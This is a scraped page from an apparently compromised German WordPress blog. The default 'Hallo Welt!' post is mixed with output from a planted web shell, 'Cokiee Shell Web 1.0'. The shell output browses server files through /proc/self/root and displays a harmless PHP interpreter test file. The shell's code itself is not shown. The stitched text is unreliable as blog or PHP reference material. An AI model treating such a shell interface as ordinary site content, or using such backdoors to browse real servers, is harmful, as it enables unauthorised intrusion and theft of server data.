Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/temporary_cleaning_009.phpt |
--TEST-- Live range & free on return --FILE-- <?php class bar { public $foo = 1; public $bar = 1; function __destruct() { throw $this->foo; } } foreach (new bar as &$foo) { try { $foo = new Exception; return; // frees the loop variable } catch (Exception $e) { echo "exception\n"; } } echo "end\n"; ?> --EXPECTF-- Fatal error: Uncaught Exception in %stemporary_cleaning_009.php:12 Stack trace: #0 {main} thrown in %stemporary_cleaning_009.php on line 12
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare